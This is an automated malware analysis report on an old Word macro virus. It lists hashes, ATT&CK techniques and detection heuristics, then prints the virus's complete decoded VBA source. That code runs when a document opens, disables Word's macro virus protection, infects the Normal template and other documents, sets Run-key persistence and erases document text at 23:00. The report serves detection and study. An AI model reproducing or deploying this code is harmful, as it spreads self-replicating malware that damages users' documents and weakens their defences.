Office (OLE) malware analysis — malicious · 2ecffb72c540125b

MALICIOUS

Office (OLE)

38.5 KB Created: 2000-02-22 17:40:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: fc6007db53b3eeb34554b28be8f94135 SHA-1: ce04c5079a367c1f4ffa353431bd01bb1a90c107 SHA-256: 2ecffb72c540125b0c4cfd237744f5da04ea09a4f78d2c35e2443f187b4b756c

288 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains VBA macros that utilize WScript.Shell and CreateObject to interact with the system. Specifically, it attempts to disable virus protection and modify registry keys related to startup execution, such as 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\AVPCC' and 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\AVPCC Service'. The presence of these actions suggests an attempt to evade defenses and establish persistence.

Heuristics 6

ClamAV: Doc.Trojan.Codefore-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Codefore-1
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage

Matched line in script

Print #1, "effect.Application.Quit"
Print #1, "Set WSHShell = WScript.CreateObject(""WScript.Shell"")"
Print #1, "WSHShell.RegDelete ""HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\AVPCC"""

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

Print #1, "On Error Resume Next"
Print #1, "Set effect = WScript.CreateObject(""Word.Application"")"
Print #1, "effect.Options.VirusProtection = False"

Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
End Sub
Private Sub Document_Open()
On Error Resume Next
```
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	7862 bytes
SHA-256: `8b7a389529ef67c2e2c1e10ed24bbbf8265c15e3745abdedf979a943bc85bcee`
Detection ClamAV: Doc.Trojan.Effect-2 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub code() effect End Sub Private Sub macro() effect End Sub Private Sub sss() Options.VirusProtection = 1 End Sub Private Sub ooo() Options.VirusProtection = 0 End Sub Private Sub zzz() On Error Resume Next Options.VirusProtection = 1 Options.SaveNormalPrompt = 1 If Dialogs(wdDialogToolsOptions).Show Then End If Options.VirusProtection = 0 Options.SaveNormalPrompt = 0 End Sub Private Sub Document_Open() On Error Resume Next Application.ScreenUpdating = 0 System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "AVPCC") = "" System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices", "AVPCC Service") = "" System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\VBA\Office", "CodeBackColors") = "1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1" System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\VBA\Office", "CodeForeColors") = "1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1" Application.EnableCancelKey = 0 Application.ShowVisualBasicEditor = 0 ActiveDocument.ReadOnlyRecommended = 0 Options.VirusProtection = 0 Options.SaveNormalPrompt = 0 If GetAttr(NormalTemplate.FullName) = vbArchive + vbReadOnly Then GoTo sgt Else GoTo uuu sgt: atr = GetAttr(NormalTemplate.FullName) If atr = 33 Then atr = 1 If atr = 1 Then GoTo nnn Else GoTo uuu nnn: NormalTemplate.OpenAsDocument SetAttr ActiveDocument.FullName, 0 ActiveDocument.Close With ActiveDocument.VBProject.VBComponents(1).CodeModule .replaceline 1, "Sub ViewVBcode()" .replaceline 4, "Sub ToolsMacro()" .replaceline 7, "Sub AutoExit()" .replaceline 10, "Sub AutoExec()" .replaceline 13, "Sub ToolsOptions()" End With Call effect ActiveDocument.Saved = True End uuu: If ActiveDocument.ReadOnly = True Then SetAttr ActiveDocument.FullName, 0 ActiveDocument.Reload End If Norma = False Document = False ZY = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(2, 1) VI = ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(2, 1) If UCase(ZY) = "EFFECT" Then Norma = True If UCase(VI) = "EFFECT" Then Document = True If Norma = True And Document = True Then GoTo 1 If Norma = False Then Set JI = NormalTemplate.VBProject.VBComponents(1).CodeModule With ActiveDocument.VBProject.VBComponents(1).CodeModule .replaceline 1, "Sub ViewVBcode()" .replaceline 4, "Sub ToolsMacro()" .replaceline 7, "Sub AutoExit()" .replaceline 10, "Sub AutoExec()" .replaceline 13, "Sub ToolsOptions()" CI = .Lines(1, .CountOfLines) End With With JI .DeleteLines 1, .CountOfLines .InsertLines 1, CI End With With ActiveDocument.VBProject.VBComponents(1).CodeModule .replaceline 1, "Private Sub code()" .replaceline 4, "Private Sub macro()" .replaceline 7, "Private Sub sss()" .replaceline 10, "Private Sub ooo()" .replaceline 13, "Private Sub zzz()" CI = .Lines(1, .CountOfLines) End With End If If Document = False Then Set HI = ActiveDocument.VBProject.VBComponents(1).CodeModule With NormalTemplate.VBProject.VBComponents(1).CodeModule .replaceline 1, "Private Sub code()" .replaceline 4, "Private Sub macro()" .replaceline 7, "Private Sub sss()" .replaceline 10, "Private Sub ooo()" .replaceline 13, "Private Sub zzz()" CI = .Lines(1, .CountOfLines) End With With HI .DeleteLines 1, .CountOfLines .InsertLines 1, CI End With With NormalTemplate.VBProject.VBComponents(1).CodeModule .replaceline 1, "Sub ViewVBcode()" .replaceline 4, "Sub ToolsMacro()" .replaceline 7, "Sub AutoExit()" .replaceline 10, "Sub AutoExec()" .replaceline 13, "Sub ToolsOptions()" End With End If 1: Z = Int((12 * Rnd) + 1) If Month(Now()) = Z Then Selection.HomeKey Unit:=wdStory Selection.WholeStory With Selection.Font .Animation = wdAnimationSparkleText End With Selection.EndKey Unit:=wdStory ActiveDocument.UndoClear End If ActiveDocument.SaveAs ActiveDocument.FullName End Sub Private Sub effect() On Error Resume Next ZY = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(2, 1) If UCase(ZY) = "EFFECT" Then Norma = True If Norma = True Then GoTo ccc Else GoTo ggg ccc: NormalTemplate.VBProject.VBComponents.Item(1).Export ("C:\WINDOWS\SYSTEM\effect.sys") GoTo bbb ggg: ActiveDocument.VBProject.VBComponents.Item(1).Export ("C:\WINDOWS\SYSTEM\effect.sys") bbb: System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "AVPCC") = "C:\WINDOWS\SYSTEM\effect.vbs" System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices", "AVPCC Service") = "C:\WINDOWS\SYSTEM\effect.vbs" Open "C:\WINDOWS\SYSTEM\effect.vbs" For Output As #1 Print #1, "On Error Resume Next" Print #1, "Set effect = WScript.CreateObject(""Word.Application"")" Print #1, "effect.Options.VirusProtection = False" Print #1, "effect.Options.SaveNormalPrompt = False" Print #1, "For x = 1 To effect.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines" Print #1, "effect.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1" Print #1, "Next" Print #1, "effect.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromFile (" & Chr(34) & "C:\WINDOWS\SYSTEM\effect.sys" & Chr(34) & ")" Print #1, "effect.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, 4" Print #1, "effect.NormalTemplate.Save" Print #1, "effect.Application.Quit" Print #1, "Set WSHShell = WScript.CreateObject(""WScript.Shell"")" Print #1, "WSHShell.RegDelete ""HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\AVPCC""" Print #1, "WSHShell.RegDelete ""HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\AVPCC Service""" Print #1, "WSHShell.RegWrite ""HKEY_CURRENT_USER\Software\Microsoft\VBA\Office\CodeBackColors"",""1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1""" Print #1, "WSHShell.RegWrite ""HKEY_CURRENT_USER\Software\Microsoft\VBA\Office\CodeForeColors"",""1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1""" Close #1 Set SS = NormalTemplate.VBProject.VBComponents(1).CodeModule With SS .DeleteLines 1, .CountOfLines End With Set ZZ = ActiveDocument.VBProject.VBComponents(1).CodeModule With ZZ .DeleteLines 1, .CountOfLines End With ActiveDocument.Saved = True Application.Quit End Sub Private Sub Document_Close() On Error Resume Next Application.ScreenUpdating = 0 If ActiveDocument.Name = ActiveDocument.FullName Then End End If If Hour(Now()) = 23 And Minute(Now()) >= 0 Then Selection.HomeKey Unit:=wdStory Selection.WholeStory Selection.Delete Unit:=wdCharacter, Count:=1 Selection.TypeText Text:="Effect" Selection.WholeStory Selection.Font.Bold = wdToggle Selection.Font.Size = 162 Selection.ParagraphFormat.Alignment = wdAlignParagraphCenter With Selection.Font .Animation = wdAnimationSparkleText End With Selection.EndKey Unit:=wdStory End If Call Document_Open End Sub ' MMM MMMMMMMMM MM ' MMMMMMMM MMMMMMMMMMMMMMMM MMMMMM ' MMMMMMMMMMMMMMM/"""""""\MMMMMMMMMMMMMMMMMMMMM ' MMMMMMMMMMMMMM\______/MMMMMMMMMMMMMMMMMMMMMM ' MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM ' MMMM MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM ' MMM MMMMMMMMMMMMM MMMMMMMMMM ' MMM MMMMMMMMMMM MMMMMMMM ' MM MMMMMMMM M MMMMMMM ' MM MMMMMMMMM MMM MMMMMM ' MMMMMMMMMMMMMM MMMMM MMMMMM ' MM MMMMMMMMMMMMMMMMMMMMMMMM MMMM ' MMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMM ' MMMMMMMMMM MM

Open this report in the interactive analyzer, or submit your own file for analysis.